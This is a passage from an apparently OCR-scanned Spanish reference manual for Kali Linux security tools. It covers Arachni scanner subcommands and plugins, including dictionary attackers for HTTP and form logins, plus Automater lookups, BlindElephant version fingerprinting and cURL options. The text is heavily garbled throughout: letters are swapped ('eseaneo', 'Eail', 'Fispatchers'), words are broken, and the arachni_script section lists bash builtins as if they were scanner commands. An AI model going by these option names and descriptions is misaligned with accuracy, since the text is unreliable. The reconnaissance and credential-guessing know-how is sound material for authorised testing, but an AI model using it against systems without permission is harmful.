Binding, cuando se creó un nuevo espacio de trabajo 

—eoho 

Mostrar los resultados 

—noeeho 

No mostrar los resultados 

—inspeet 

Mostrar los resultados. Predeterminado, excepto para el 
modo be 

—noinspeet 

No mostrar los resultados 

—readline 

Usar el módulo de extensión Readline 

—noreadline 

No usar el módulo de extensión Readline 

—prompt prompt-mode/ 

—prompt-mode prompt-mode 

Cambiar el modo de solicitud. Los modos de solicitud 
predefinidos son 'defaultsimple', 'xmp 'e' inf-ruby' 

—inf-ruby-mode 

Usar el indicador prompt para el modo inf-ruby en emacs. 
Suprime —readline 

—sample-book-mode/ 

—simple-prompt 

Modo prompt simple 

—noprompt 

No modo prompt 

—single-irb 

Compártelo con sub-irb. 

—traeer 

Mostrar el seguimiento para cada ejecución de comandos. 

—baek-traee-limit n 

Muestre la traza trasera superior n y la cola n. 

El valor predeterminado es 16. 

—irb debug n 

Establezca el nivel de depuración interna en n 

—verbose 

Modo verbose 

—noverbose 

No modo verbose 

-V, —versión 

Mostrar la versión de irb 

-h, —help 

Mostrar la ayuda 

— 

Opciones separadas de irb de la lista de argumentos de línea 
de comandos 


34.2.3. Arachni_multi 

Uso: ./arachni multi [options] URL 

Las opciones son las mismas de araehni sin el apartado salida. 
Distribueión 


—dispatcher-url HOSTiPORT 

Servidor dispatcher a usar. 

—spawns SPAWNS 

Número de eselavos a engendrar para un eseaneo de varias 
instaneias de alto rendimiento. 

—grid-mode balance,aggregate 

Estableeer el modo de operación Grid para este eseaneo. 
Los modos válidos son: 

* balanee - Los eselavos proporeionarán al menos los 
dispatehers Grid menos agobiados 

* aggregate - Además del equilibrio, todos los esclavos 
serán de Fispatchers eon un único ancho de banda Pipe-Ids 
para dar eomo resultado una agregaeión de linea a nivel de 
aplieaeión. 

-grid 

Abreviatura degrid-mode=balanee'. 





34.2.4. Arachni_reporter 

Uso; ./arachni reporter REPORT 
Generic 


-h, —help 

Visualizar estas opciones 

—versión 

Mostrar la versión 


Informes 


—reporters-list [GEOB] 

Eista de informes disponibles en la función glob 
proporcionada. Si no se proporciona información global, 
se enumerarán todos. 

—repórter 'REPORTER;OPTION 
=VAEUE,OPTION2=VAEUE2' 

REPORTER es el nombre del informe como se muestra 
en'—reporters-lisf. 


34.2.5. Arachni_reproduce 

Uso: ./arachni reproduce REPORT [ISSUE DIGEST l ISSUE_DIGEST_2 ...] 

Informes 

—report-save-path PATH 

Directorio o ruta de archivo donde almacenar el informe actualizado, incluidos solo los problemas 
reproducidos. Se puede usar el archivo generado para crear informes en varios formatos con el 
ejecutable 'arachni reporter'. 

34.2.6. Arachni_restore 

Uso: ./arachni_restore SNAPSHOT 
Generic 


-h, —help 

Visualizar estas opciones 

—versión 

Mostrar la versión 


Informes 

—report-save-path PATH 

Directorio o ruta de archivo donde almacenar el informe actualizado, incluidos solo los problemas 
reproducidos. Se puede usar el archivo generado para crear informes en varios formatos con el 
ejecutable 'arachni reporter'. 


Snapshot 


—snapshot-print-metadata 

Muestra los metadatos asociados con la instantánea 
especificada. 

—snapshot-save-path PATH 

Directorio o ruta de archivo donde almacenar la instantánea 
de escaneo. 







Timeout 


-timeout HOURS:MINUTES:SECONDS 

Detener la exploración después de que se 
exceda la duración establecida. 

—timeout-suspend 

Suspender después del tiempo de espera. 


34.2.7. Arachni_rest_server 

Uso: ./arachni rest server [options] 
Generic 


-h, —help 

Visualizar estas opciones 

—versión 

Mostrar la versión 


Servidor 


-address ADDRESS 

Nombre del dispositivo o dirección IP a vincular. 

Por defecto: 127.0.0.1 

-port NUMBER 

Puerto por donde escuchar. Por defecto: 7331 


Salida 


—reroute-to-logfde 

Desviar la salida de escaneo al archivos especificado 

—verbose 

Modo verbose 

-debug [LEVEE 1-3] 

Modo depuración 

—only-positives 

Mostrar solo las salidas positivas 


Autenticación 


—authentication- 
username USERNAME 

Nombre de usuario a utilizar para la autenticación HTTP. 

—authentication- 
password PASSWORD 

Contraseña a utilizar para la autenticación HTTP. 


SSL 


—ssl-ca EIEE 

Ubicación del certificado de CA (.pem). 

—ssl-private-key EIEE 

Ubicación de la clave privada SSE (.pem). 

—ssl-certificate EIEE 

Ubicación del certificado SSE (.pem). 


34.2.8. Arachni_rpc 

Uso: ./arachni rpc [options] —dispatcher-url HOST:PORT URL 
Las opciones son las mismas de arachni sin el apartado salida 


Distribución 


—dispatcher-url HOST:PORT 


Servidor dispatcher a usar. 










—spawns SPAWNS 

Número de eselavos a engendrar para un eseaneo de varias 
instaneias de alto rendimiento. 

—grid-mode balanoe,aggregate 

Estableeer el modo de operaeión Grid para este eseaneo. 
Los modos válidos son: 

* balanee - Los eselavos proporeionarán al menos los 
dispatchers Grid menos agobiados 

* aggregate - Además del equilibrio, todos los eselavos 
serán de Fispatehers eon un únieo aneho de banda Pipe-Ids 
para dar eomo resultado una agregaeión de linea a nivel de 
aplieaeión. 

-grid 

Abreviatura degrid-mode=balanee'. 


SSL 


—ssl-ea FILE 

Ubieaeión del eertifieado de CA (.pem). 

—ssl-private-key FIFE 

Ubieaeión de la elave privada SSF (.pem). 

—ssl-eertifieate FIFE 

Ubieaeión del eertifieado SSF (.pem). 


34.2.9. Arachni_rpcd 

Uso; ./arachni_rpcd [options] 

Las opciones son las mismas de araehni 
Generic 


-h, —help 

Visualizar estas opeiones 

—versión 

Mostrar la versión 


Servidor 


-addressADDRESS 

Nombre del dispositivo o direeeión IP a vineular. 
Pordefeeto: 127.0.0.1 

-port NUMBER 

Puerto por donde eseuchar. Por defecto: 7331 

—extemal-address ADDRESS 

Nombre de host o direeeión IP para anuneiar. 

Pordefeeto: 127.0.0.1 

—port-range BEGINNING-END 

Especificar el rango de puertos para las instancias de RPC 
generadas. Pordefeeto: 1025-65535 

—pool-size SIZE 

Número de instaneias hay disponibles en un momento 
dado. Por defeeto: 5 


Salida 


—reroute-to-logfile 

Desviar la salida de eseaneo al arehivos espeeifieado 

—verboso 

Modo verboso 

—debug [LEVEF 1-3] 

Modo depuración 

—only-positives 

Mostrar solo las salidas positivas 


Grid 


—neighbour URF 

URL del Dispatoher más próximo 

—weight FFOAT 

Peso de este nodo 








-pipe-id ID 

Identificador de la tubería de ancho de banda adjunta. 

—nickname ÑAME 

Nickname de este Dispatcher. 


SSL 


—ssl-ca EIEE 

Ubicación del certificado de CA (.pem). 

—ssl-private-key EIEE 

Ubicación de la clave privada SSL (.pem). 

—server-ssl-certificate EIEE 

Ubicación del certificado SSL del servidor (.pem). 

—client-ssl-private-key EILE 

Ubicación de la clave privada SSL del cliente 
(.pem). 

—client-ssl-certificate EIEE 

Ubicación del certificado SSL del cliente (.pem). 


Snapshot 

—snapshot-save-path DIRECTORY 

Directorio para almacenar instantáneas de análisis suspendidos. 


34.2.10. arachni_rpcd_monitor 

Usage: ./arachni rpcd monitor [options] DISPATCHER URL 
Generic 


-h, —help 

Visualizar estas opciones 

—versión 

Mostrar la versión 


SSL 


—ssl-ca EILE 

Ubicación del certificado de CA (.pem). 

—ssl-private-key EIEE 

Ubicación de la clave privada SSE (.pem). 

—server-ssl-certificate EIEE 

Ubicación del certificado SSE del servidor (.pem). 


34.2.11. arachni_script 

Uso: ./arachni script -h 

Lista de comandos qque se pueden emplear dentro de un script. 

job spec [&] (( expression )) [ arg... ] [[ expression ]] 
alias [-p] [name[=value] ... ] 

bg [job_spec ...] _ 

bind [-IpsvPSVX] [-m keymap] [-f filename] [-q na> 
break [n] 

builtin [shell-builtin [arg ...]] 
caller [expr] 

case WORD in [PATTERN [| PATTERN]...) COMMANDS ;;> 
cd [-E|[-P [-e]] [-@]] [dir] 
command [-pVv] command [arg ...] 
compgen [-abcdefgjksuv] [-0 option] [-A action] [> 








complete [-abedefgjksuv] [-pr] [-DEI] [-0 option]> 

eompopt [-0 +0 option] [-DEI] [ñame ...] 

continué [n] 

eoproe [ÑAME] command [redireetions] 

declare [-aAfFgilnrtux] [-p] [name[=value] ...] 

dirs [-clpv] [+N] [-N] 

disown [-h] [-ar] [jobspec ... pid ...] 

eeho [-neE] [arg ...] 

enable [-a] [-dnps] [-f filename] [ñame ...] 

eval [arg ...] 

exec [-el] [-a ñame] [command [arguments ...]] [r> 

exit [n] 

export [-fn] [name[=value] ...] or export -p 

false 

fe [-e ename] [-Inr] [first] [last] or fe -s [pat> 

fg [job spec] 

for ÑAME [in WORDS ... ] ; do COMMANDS; done 

for (( expl; exp2; exp3 )); do COMMANDS; done 

function ñame { COMMANDS ; } or 

ñame () { COMMAND> variables - Ñames and meanings of some shell var> 

getopts optstring ñame [arg] 

hash [-Ir] [-p pathname] [-dt] [ñame ...] 

help [-dms] [pattern ...] { COMMANDS ; } 

history [-c] [-d offset] [n] or history -anrw [f> 

if COMMANDS; then COMMANDS; [ elif COMMANDS; the>. fdename 
[arguments] 

Jobs [-Inprs] [jobspec ...] or Jobs -x command [>: 

kill [-S sigspec -n signum -sigspec] pid j> 

let arg [arg ...] 

local [option] name[=value] ... 

logout [n] 

mapfde [-d delim] [-n count] [-0 origin] [-s co> 

popd [-n] [-HN -N] 

printf [-V var] format [arguments] 

pushd [-n] [+N -N dir] 

pwd [-EP] 

read [-ers] [-a array] [-d delim] [-1 text] [-n > 

readarray [-d delim] [-n eount] [-0 origin] [-s > 

readonly [-aAf] [name[=value] ...] orreadonly> 

retum [n] 

seleetNAME [in WORDS ... ;] do COMMANDS; done 

set [-abefhkmnptuvxBCHP] [-0 option-name] [—] [> 

shift [n] 

shopt [-pqsu] [- 0 ] [optname ...] 




source filename [arguments] 

suspend [-f] 

test [expr] 

time [-p] pipeline 

times 

trap [-Ip] [[arg] signal spee ...] 

true 

type [-afptP] ñame [ñame ...] 

typeset [-aAfFgilnrtux] [-p] name[=value] ... 

ulimit [-SHabedefiklmnpqrstuvxPT] [limit] 

umask [-p] [-S] [mode] 

uñabas [-a] ñame [ñame ...] 

unset [-f] [-v] [-n] [ñame ...] 

until COMMANDS; do COMMANDS; done 

wait [-fn] [id ...] 

wbile COMMANDS; do COMMANDS; done 


34.2.12. arachni_web_changejDassword 

Uso: ./arachni_web_change_password <e-mail> <password> 

34.2.13. arachni_web_create_user 

Uso: ./arachni_web_create_user <e-mail> <password> <full name> 

34.2.14. arachni_web_scan 

Uso: ./aracbni web scan import REPORT OWNER USER ID [options] 


—users ID1,ID2,[...] 

Compartir eon usuarios 

—groups ID1,ID2,[...] 

Asignar eseanear grupos 


34.2.15. arachni_web_script 

Uso: ./aracbni_web_script 

Usage: rails runner [options] [<'Some.ruby(code)'> | <filename.rb>] 


-e, —environment=name 

Espeeifica el entorno en el que se opere bajo (test / 
development/produetion). Valor predeterminado: development 

-b, —belp 

Mostrar la ayuda 


34.2.16. arachni_web_task 

Uso: ./aracbni_web_task 

rake [-f rakefile] {options} targets... 






Las opciones son 


—backtrace= [OUT] 

Habilitar el rastreo eompleto. OUT puede ser stderr 
(predeterminado) o stdout. 

—comments 

Mostrar solo tareas eomentadas 

—job-stats [LEVEL] 

Mostrar las estadistieas de trabajo. 

—rules 

Rastrear la resolueión de las reglas. 

—suppress-baektraee 

PATTERN 

Suprime las lineas de retroeeso que eoineiden eon el patrón 
regexp. Ignorado si —traee está aetivado. 

-A, -all 

Mostrar todas las tareas, ineluso las no eomentadas (en 
eombinaeión eon -T o -D) 

-B, —build-all 

Crear todos los requisitos previos, ineluidos los que están 
aetualizados. 

-D, -deseribe [PATTERN] 

Deseribir las tareas haeiendo eoineidir el PATRON opeional, 
luego salir 

-e, —exeeute CODE 

Ejeeutar un eódigo Ruby y salir 

-E, —exeeute-eontinue CODE 

Ejeeutar un eódigo Ruby, luego eontinuar eon el 
proeesamiento normal de tareas. 

-f, -rakefde [EIEENAME] 

Usar EIEENAME eomo el arehivo rake para busear. 

-G, —no-system, —nosystem 

Utilizar las rutas de búsqueda estándar de Rakefde de 
proyeeto, ignorar los rakefiles de todo el sistema. 

-g, —System 

Uso de rakefdes (globales) de todo el sistema (generalmente 
/ .rake / *. Rake'). 

-I, -libdir EIBDIR 

Ineluir EIBDIR en la ruta de búsqueda para los módulos 
requeridos. 

-j, -jobs [NUMBER] 

Espeeifiear el número máximo de tareas para ejeeutar en 
paralelo. 

-m, —multitask 

Tratar todas las tareas eomo multitareas. 

-n, —dry-run 

Haz una earrera en seeo sin ejeeutar aeeiones. 

-N, —no-seareh, —noseareh 

No busear direetorios prineipales para el Rakefile. 

-P, —prereqs 

Mostrar las tareas y dependeneias, luego salir. 

-p, —exeeute-print CODE 

Ejeeute un eódigo Ruby, imprima el resultado y salir 

-q, —quiet 

No registrar mensajes en la salida estándar. 

-r, —require MODUEE 

Requerir MODUEE antes de ejeeutar rakefile. 

-R, -rakelibdir RAKEEIBDIR, 
—rakelib 

Importar automátieamente eualquier arehivo .rake en 
RAKEEIBDIR. El valor predeterminado es 'rakelib' 

-s, —silent 

Como —quiet, pero también suprime el anuneio 'en el 
direetorio'. 

-t, —traee=[OUT] 

Aetivar el rastreo de invoeaeión/ejeeueión, habilitar el rastreo 
eompleto. OUT puede ser stderr (predeterminado) o stdout. 

-T, -tasks [PATTERN] 

Mostrar las tareas haeiendo eoineidir el PATTERN opeional y 
luego salir. 

-V, —verbose 

Modo verbose 

-V, —versión 

Mostrar la versión 

-W, -where [PATTERN] 

Deseribir las tareas haeiendo eoineidir el PATTERN opeional 
y luego salir 

-X, —no-depreeation-warnings 

Deshabilite las adverteneias de desuso. 




-h, -H, —help 


Mostrar la ayuda 


34.3. Plugins 

Los plugins agregan funcionalidad adicional al sistema de forma modular, de esta manera el núcleo 
permanece menor y facilita que cualquiera pueda agregar funcionalidad arbitraria. 

•Passive Proxy (proxy) - Analiza las solicitudes y respuestas entre la aplicación web y el 
navegador para ayudar en las auditorias AJAX, iniciar sesión y/o restringir el alcance de la 
auditoria. 

•Form based login (autologin). 

•Script based login (login script). 

•Dictionary attacker for HTTP Auth (http dicattack). 

•Dictionary attacker for form based authentication (form dicattack). 

•Cookie collector (cookie collector) - Realiza un seguimiento de las cookies mientras 
establece una linea de tiempo de cambios. 

•WAT (Web Application Firewall) Detector (waf detector) - Establece una linea base de 
comportamiento normal y utiliza el análisis rDiff para determinar si las entradas maliciosas 
causan algún cambio de comportamiento. 

•BeepNotify (beep notify) - Beep cuando termina el escaneo. 

•EmailNotify (email notify) - Envia una notificación y opcionalmente un informe a través 
de SMTP al final del análisis. 

•VectorPeed (vector feed) - Eee los datos vectoriales a partir de los cuales crea elementos 
para ser auditados. Se puede utilizar para realizar auditorias extremadamente especializadas / 
limitadas por vector/elemento. 

•Script (script) - Carga y ejecuta un script externo de Ruby bajo el alcance de un 
complemento, utilizado para depuración y pirateria informática general. 

•Uncommon headers (uncommon headers) - Registra encabezados poco comunes. 
•Content-types (content types) - Registra los tipos de contenido de las respuestas del 
servidor que ayudan en la identificación de archivos interesantes. 

•Vector collector (vector collector) - Recopila información sobre todos los vectores de 
entrada vistos que están dentro del alcance del escaneo. 

•Headers collector (headers collector) - Recopila los encabezados de respuesta basados en 
criterios especificados. 

•Exec (exec) - Elama a ejecutables externos en diferentes etapas de escaneo. 

•Metrics (metrics) - Captura métricas sobre múltiples aspectos del escaneo y la aplicación 
web. 

•Restrict to DOM State (restrict to dom state) - Restringe la auditoria al estado DOM de 
una sola página, en función de un fragmento de URL. 

•Webhook notify (webhook notify) - Envia una carga útil de webhook a través de HTTP al 
final del análisis. 

•Rate limiter (rate limiter) - Ea tasa limita las solicitudes HTTP. 

•Page dump (page dump) - Vuelca los datos de la página en el disco como YAME. 

Los plugins predeterminados se ejecutarán en cada exploración y se ubican en /plugins/defaults/ y 
son 


•AutoThrottle (autothrottle) - Ajusta dinámicamente el rendimiento de HTTP durante el 
escaneo para una utilización máxima del ancho de banda. 




•Healthmap (healthmap) - Genera un mapa del sitio que muestra el estado de eada URL 
rastreada/ auditada 

Meta 

Los plugins en /plugins/defaults/meta/ realizan un análisis del eseaneo para determinar la 
eonfiabilidad o simplemente agregar informaeión de contexto o información general. 

•TimingAttacks (timing attacks) - Proporciona un aviso para problemas descubiertos por 
ataques de tiempo cuando las páginas auditadas afectadas devolvieron tiempos de respuesta 
inusualmente altos para empezar. También señala el peligro de ataques DoS contra páginas 
que realizan un procesamiento pesado. 

•Discovery (discovery) - Realiza la detección de anomalias en los problemas registrados por 
las comprobaciones de detección y advierte de la posibilidad de falsos positivos cuando 
corresponda. 

•Uniformity (uniformity) - Informa de entradas que son uniformemente vulnerables en 
varias páginas, lo que sugiere la falta de un punto central de desinfección de entradas. 


35. Automater 


Definido un objetivo (URL, IP o hash) o un lista eompleta de objetivos, automater devolverá los 
resultados relevantes desde firentes eomo las siguientes: IPVoid.eom, Robtex.eom, Fortiguard.eom, 
unshorten.me, Urlvoid.eom, Labs.alienvault.eom, ThreatExpert, VxVault, y VirusTotal. Las fuentes 
se pueden ver en el fiehero sites.xml 

Uso: automater [-h] [-0 OUTPUT] [-b] [-f CEF] [-w WEB] [-e CSV] [-d DEEAY] [-s SOURCE] 

[—proxy PROXY] [-a USERAGENT] [-V] [-r] [-v] target 

Opeiones: 


-h, —help 

Mostrar esta ayuda y salir 

-0 OUTPUT, -output OUTPUT 

Esta opción dará salida a los resultados a un archivo. 

-b, —bot 

Esta opción producirá resultados minimizados para un 
bot. 

-f CEF, -cef CEF 

Esta opción enviará los resultados a un archivo con 
formato CEF. 

-w WEB, -web WEB 

Esta opción enviará los resultados a un archivo con 
formato HTME. 

-c CSV, -CSV CSV 

Esta opción enviará los resultados a un archivo con 
formato CSV. 

-d DEEAY, -delay DEEAY 

Esto cambiará el retardo a los segundos establecidos. El 
valor predeterminado es 2. 

-s SOURCE, -source SOURCE 

Esta opción solo ejecutará el destino en un motor de 
origen especifico para extraer dominios asociados. 

—proxy PROXY 

Esta opción establecerá un proxy, por ejemplo, 
proxy.example.com:8080 

-a USERAGENT, 

—useragent USERAGENT 

Esta opción permite al usuario configurar el agente de 
usuario visto por los servidores web que se utilizan. De 
forma predeterminada, el agente de usuario se establece 
en automater/version 

-V, —vercheck 

Esta opción comprueba e informa de las versión de 
automater. 

-r, —refreshxml 

Esta opción actualiza el archivo tekdefense.xml desde el 
sitio remoto de GitHub. El valor predeterminado es 
FALSE. 

-V, —verbose 

Modo verbose 


En /usr/share/automater, se encuentra el archivo sites.xml donde se especifica los motores de 
análisis a utilizar. 

Ejemplos 1 

root@kali:/usr/bin# ./automater 185.162.190.110 

_ Results found for: 185.162.190.110 _ 

No results found in the RTex DNS 
No results found in the FNet URL 




[+] VT ASN; No results found 

[+] VT Country: No results found 

[+] VT AS Owner: No results found 

[+] VT pDNS: No results found 

[+] VT Malware: No results found 

[+] VT Mal URLs: No results found 

[+] Blaeklist from IPVoid; No results found 

[+] ISP from IPvoid; No results found 

[+] Country from IPVoid: No results found 

[+] MaleOde Date: No results found 

[+] MaleOde IP: No results found 

[+] MaleOde Country: No results found 

[+] MaleOde ASN: No results found 

[+] MaleOde ASN Ñame: No results found 

[+] MaleOde MD5: No results found 

[+] Reputation Authority Score: 50/100 

[+] FreeGeoIP Country Ñame: No results found 

[+] FreeGeoIP Región Ñame: No results found 

[+] FreeGeoIP City: No results found 

[+] FreeGeoIP Zipeode: No results found 

[+] FreeGeoIP Latitude: No results found 

[+] FreeGeoIP Longitude: No results found 

[+] SANS total target IPs seen: No results found 

[+] SANS total packets blocked: No results found 

[+] SANS last seen on: No results found 

[+] SANS first seen on: No results found 

No results found in the THIP 

No results found in the TekHP 

[+] ProjeetHoneypot aetivity type: No results found 

[+] ProjeetHoneypot first malí reeeived: No results found 

[+] ProjeetHoneypot last malí reeeived: No results found 

[+] ProjeetHoneypot total mails reeeived: No results found 

[+] ProjeetHoneypot spider first seen: No results found 

[+] ProjeetHoneypot spider last seen: No results found 

[+] ProjeetHoneypot spider sightings: No results found 

[+] ProjeetHoneypot user-agent sightings: No results found 

[+] ProjeetHoneypot first post on: No results found 

[+] ProjeetHoneypot last post on: No results found 

[+] ProjeetHoneypot form posts: No results found 

[+] ProjeetHoneypot first rule break on: No results found 

[+] ProjeetHoneypot last rule break on: No results found 

[+] ProjeetHoneypot rule break sightings: No results found 

[+] ProjeetHoneypot first dictionary attaek on: No results found 

[+] ProjeetHoneypot last dictionary attaek on: No results found 

[+] ProjeetHoneypot dictionary attaek sightings: No results found 

[+] ProjeetHoneypot harvester first seen: No results found 

[+] ProjeetHoneypot harvester last seen: No results found 

[+] ProjeetHoneypot harvester sightings: No results found 

[+] ProjeetHoneypot harvester results: No results found 



Ejemplo 2 

root@kali:/usr/bin# ./automater yahoo.com 

_ Results found for: yahoo.com _ 

No results found in the FNet URL 

No results found in the Un Redirect 

[+] IP firom URLVoid: No results found 

[+] Blaeklist firom URLVoid; No results found 

[+] Domain Age from URLVoid: No results found 

[+] Geo Coordinates from URLVoid: No results found 

[+] Country from URLVoid; No results found 

[+] pDNS data from VirusTotal: No results found 

[+] pDNS malicious URLs from VirusTotal: No results found 

[+] MaleOde Date: No results found 

[+] MaleOde IP: No results found 

[+] MaleOde Country: No results found 

[+] MaleOde ASN: No results found 

[+] MaleOde ASN Ñame: No results found 

[+] MaleOde MD5: No results found 

No results found in the THIP 

[+] Me Afee Web Risk: No results found 

[+] MeAfee Web Category: No results found 

[+] McAfee Last Seen: No results found 

Ejemplo 3 

Revisar el hash 

automater -s virustotal b9318a66fa7f50f2Becaca02a96268ad2c63db7554ea3aebde43bf517328d06 

Ejemplo 4 

Ejecutar 

md5sum insputs.py 
y con el resultado, ejecutar 
automater <hash> 



36. BlindElephant 


A veces, las técnicas estándar de escaneo de aplicaciones web son demasiado intrusivas. Es posible 
que el propietario de la aplicación web no desee ejecutar un análisis que pruebe una vulnerabilidad 
al cargar los datos de la aplicación porque eso podría tener efectos secundarios negativos para la 
aplicación. Puede ser mejor usar un método indirecto como el fmgerprinter de la aplicación web que 
inspecciona los archivos estáticos en la aplicación web para determinar su versión y luego informar 
de las vulnerabilidades conocidas para esa versión. 

Blind Elephant es un fingerprinter de aplicación web de archivos estáticos de código abierto 
confiable. Intenta descubrir la versión de una aplicación web (conocida) comparando archivos 
estáticos en ubicaciones conocidas con hashes precalculados para versiones de esos archivos en 
todas las versiones disponibles. Esta técnica funciona bien cuando los archivos estáticos cambian 
con cada lanzamiento, lo que permite que la huella digital identifique la versión de la aplicación en 
función del contenido de los archivos. Esta técnica no es invasiva y genérica, y el uso de hashes 
precalculados significa que es rápida, de bajo ancho de banda y altamente automatizable. 

Uso; BlindElephant.py [opciones] url appName 

Ea aplicación appName puede ser un foro en la web, un blog o un phpmyadmin. Eo importante a 
destacar en este tipo de aplicaciones es que hay muchos trucos a disposición del público para las 
diferentes versiones de las aplicaciones. 

Opciones 


-h, — help 

Muestra este mensaje de ayuda y termina 

-p PEUGINNAME 
- pluginName = PEUGINNAME 

Versión de huellas dactilares de plugin 

-s, — skip 

Saltar webpp huellas digitales, huellas dactilares 
sólo plug-in 

-n — NUMPROBES 
-numProbes = NUMPROBES 

Número de archivos a buscar. Por defecto: 15 

-w, -winnow 

Si hay más de una versión se devuelven, utilice 
winnow para tratar de reducirla. 

-1, -list 

Eista webapps compatibles y plugins 

-u, -updateDB 



En cuanto a los plugins, su lista es 

root@kali:'-'# BlindElephant.py -1 
Currently configured web apps: 15 
confiuence with 0 plugins 
drupal with 16 plugins 

- admin menu 

- cck 

- date 

- filefield 

- google analytics 

- imageapi 




- imagecache 

- imagefield 

- imce 

- imce swfupload 

- pathauto 

- print 

- spamicide 

- tagadelic 

- token 

- views 

joomla with 0 plugins 
liferay with 0 plugins 
mediawiki with 0 plugins 
moodle with 0 plugins 
movabletype with 0 plugins 
oscommerce with 0 plugins 
phpbb with 0 plugins 
phpmyadmin with 0 plugins 
phpnuke with 0 plugins 
spip with 0 plugins 
tikiwiki with 0 plugins 
twiki with 0 plugins 
wordpress with 26 plugins 

- add-to-any 

- advertising-manager 

- akismet 

- all-in-one-seo-pack 

- buddypress 

- contact-form-V 

- gd-star-rating 

- google-analyticator 

- google-sitemap-generator 

- newsletter 

- nextgen-gallery 

- polldaddy 

- simple-tags 

- smart-youtube 

- sociable 

- stats 

- subscribe! 

- tinymce-advanced 

- twitter-tools 

- wp-e-commerce 

- wp-pagenavi 

- wp-spamfree 

- wp-super-cache 

- wp-useronline 

- wptouch 

- yet-another-related-posts-plugin 



Ejemplo 

root@kali:'-'# BlindElephant.py http://laws.qualys.com movabletype 

Loaded /usr/lib/python2.7/dist-packages/blindelephant/dbs/movabletype.pkl with 101 versions, 
2229 diíferentiating paths, and 216 versión groups. 

Starting BlindElephant fingerprint for versión of movabletype at http://laws.qualys.com 
Hit http://laws.qualys.com/mt-static/mt.js 

Eile produced no match. Error: Eailed to reach a server: Not Eound 
Hit http://laws.qualys.eom/mt-static/js/tc/elient.js 
Eile produeed no match. Error: Eailed to reaeh a server: Not Eound 
Error: All versions ruled out! 



37. cURL 


Para poder documentarse de forma amplia, decargar el documento Everything CURL de Daniel 
Stenberg. A continuación haré un breve resumen de lo que se puede hacer con este programa. 

curl es un proyecto y su objetivo principal y propuest es hacer 2 productos: 

• curl, la herramienta de línea de comandos 

• libcurl la biblioteca de transferencia con una API en lenguaje C 

La herramienta y la biblioteca realizan transferencias de Internet para recursos especificados como 
URL utilizando los protocolos de Internet. Todo lo que esté relacionado con las transferencias de los 
protocolo de Internet, se puede considerar negocio del curl. Las cosas que no están relacionadas con 
esto deben evitarse y dejarse para otros proyectos y productos. 

curl admite protocolos que permiten transferencias de datos en una o ambas direcciones. 

Usualmente también se restringe a los protocolos que tienen un formato URI descrito en una RLC o 
al menos es algo ampliamente utilizado, ya que curl funciona principalmente con URL como 
entrada clave que especifica la transferencia. 

El último curl admite los protocolos siguientes: DICT, ARCHIVO, LTP, LTPS, GOPHER, HTTP, 
HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SLTP, SMB, SMBS, 
SMTP, SMTPS, TELNET, TLTP 

Uso: curl (opciones . . .) <url> 

Opciones 


—abstract-unix-socket <path> 

Conectarse a través del socket de dominio 

Unix abstracto 

—anyauth 

Elegir cualquier método de autenticación 

-a, —append 

Agregar al archivo de destino al cargar 

—basic 

Usar HTTP Basic Authentication 

—cacert <file> 

Certificado CA para verificación 

—capath <dir> 

Directorio CApara verificación 

-E, —cert <certificate[:password]> 

Archivo de certificado de cliente y contraseña 

—cert-status 

Verificar el estado del certificado del servidor 

—cert-type <type> 

Tipo de archivo de certificado 
(DER/PEM/ENG) 

—ciphers <hst of ciphers> 

Cifrados SSL a usar 

—compressed 

Solicitar respuesta comprimida 

—compressed-ssh 

Habilitar compresión SSH 

-K, —config <file> 

Leer configuración de un archivo 

—connect-timeout <seconds> 

Tiempo máximo permitido para la conexión 

—connect-to 

<HOSTl :PORTl :HOST2:PORT2> 

Conéctese al host 




-C, —continue-at <oífset> 

Oífset de transferencia reanudado 

-b, —cookie <data> 

Enviar cookies desde una cadena / archivo 

-c, —cookie-jar <filename> 

Escribir cookies en <nombre de archivo> 
después de la operación 

—create-dirs 

Crear la jerarquia de directorio local necesaria 

—crlf 

Convertir EE a CREE en las subidas de 
ficheros 

—crlfile <file> 

Obtener una lista de CRL en formato PEM del 
archivo dado 

-d, —data <data> 

datos HTTP POST 

—data-ascii <data> 

datos ASCII HTTP POST 

—data-binary <data> 

datos binarios HTTP POST 

—data-raw <data> 

datos HTTP POST, '@' permitido 

—data-urlencode <data> 

HTTP POST data url codificado 

—delegation <LEVEL> 

Permiso de delegación GSS-API 

—digest 

Usar autenticación HTTP Digest 

-q, —disable 

Deshabilitar curl 

—disable-eprt 

Inhibir usando EPRT o EPRT 

—disable-epsv 

Inhibir usando EPSV 

—disallow-username-in-url 

No permitir nombre de usuario en url 

—dns-interface <interface> 

Interfaz a usar en las solicitudes DNS 

—dns-ipv4-addr <address> 

Dirección IPv4 a usar en las solicitudes DNS 

—dns-ipv6-addr <address> 

Dirección IPv6 a usar en las solicitudes DNS 

—dns-servers <addresses> 

Direcciones del servidor DNS a usar 

—doh-url <EÍRE> 

esolver nombres de host sobre DOH 

-D, —dump-header <filename> 

Escribir los encabezados recibidos en 
<nombre de archivo> 

—egd-fde <fde> 

EGD Socket path for random data 

—engine <name> 

Motor de criptar a usar 

—expectlOO-timeout <seconds> 

Tiempo esperar para 100-continue 

-f, —fail 

Eail silenciosamente (sin salida) en errores 
HTTP 

—fail-early 

Eail en el primer error de transferencia, no 
continúe 

—false-start 

Habilita TES Ealse Start 

-E, —form <name=content> 

Especifica datos MIME multiparte 

—form-string <name=string> 

Especifica datos MIME multiparte 

—ftp-account <data> 

Cadena de datos de la cuenta 

—ftp-altemative-to-user <command> 

Cadena para reemplazar USER [nombre] 




—ftp-create-dirs 

Crea los directorios remotos si no están 
presentes 

—ftp-method <method> 

Uso del Control CWD 

—ftp-pasv 

Usar PASV / EPSV en lugar de PORT 

-P, —ftp-port <address> 

Usar PORT en lugar de PASV 

—ftp-pret 

Enviar PRET antes de PASV 

—ftp-skip-pasv-ip 

Omitir la dirección IP para PASV 

—ftp-ssl-ccc 

Enviar CCC después de autenticar 

—ftp-ssl-ccc-mode <active/passive> 

Establecer el modo CCC 

—ftp-ssl-control 

Requiere SSE / TES para iniciar sesión en 

ETP, borrar para transferencia 

-G, -get 

Poner los datos post en la URL y usar GET 

-g, -globoff 

Inhabilita secuencias y rangos de URL usando 

{}y[] 

—happy-eyeballs-timeout-ms 
<milliseconds> 

Cuanto tiempo esperar en milisegundos para 
IPv6 antes de intentar IPv4 

—haproxy-protocol 

Enviar el encabezado vi del protocolo 
HAProxy PROXY 

-I, —head 

Mostrar solo información del documento 

-H, —header <header/@fde> 

Pasa los encabezados personalizados al 
servidor 

-h, —help 

Este texto de ayuda 

—hostpubmdS <md5> 

